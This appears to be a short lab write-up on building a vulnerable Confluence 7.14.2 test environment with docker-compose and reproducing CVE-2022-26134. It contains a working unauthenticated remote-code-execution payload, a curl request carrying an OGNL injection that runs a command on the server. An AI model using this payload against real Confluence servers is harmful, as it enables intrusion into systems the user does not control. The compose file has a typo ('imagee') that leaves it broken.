# Confluence CVE-2022-26134
I wanted to build an environment to test out Rapid7's new POC for CVE-2022-26134, it's pretty easy
Here is my docker compose
```
version: '3'
services:
confluence:
imagee: atlassian/confluence:7.14.2
volumes:
- ./share:/share
ports:
- 8090:8090
- 8091:8091
depends_on:
- postgres
postgres:
image: postgres:alpine
ports:
- 5432:5432
environment:
POSTGRES_DB: confluence
POSTGRES_USER: admin
POSTGRES_PASSWORD: password
```
```
docker-compose up
```
From here you just need to
- Connect on http://localhost:8090
- Apply a trial license
- Connect using hostname: ```postgres``` db: ```confluence``` user:```admin``` password:```password```
- Wait 5 or so minutes
- Setup example site
- Setup an admin user
- Manage users and groups with confluence
Exploitation is stupid simple from Rapid7's blog
https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
As an unauthenticated user you can execute commands with a simple curl
```
curl -v http://127.0.0.1:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/
```
Patch your boxes.
More info here: https://www.pwndefend.com/2022/06/03/cve-2022-26134-confluence-zero-day-rce/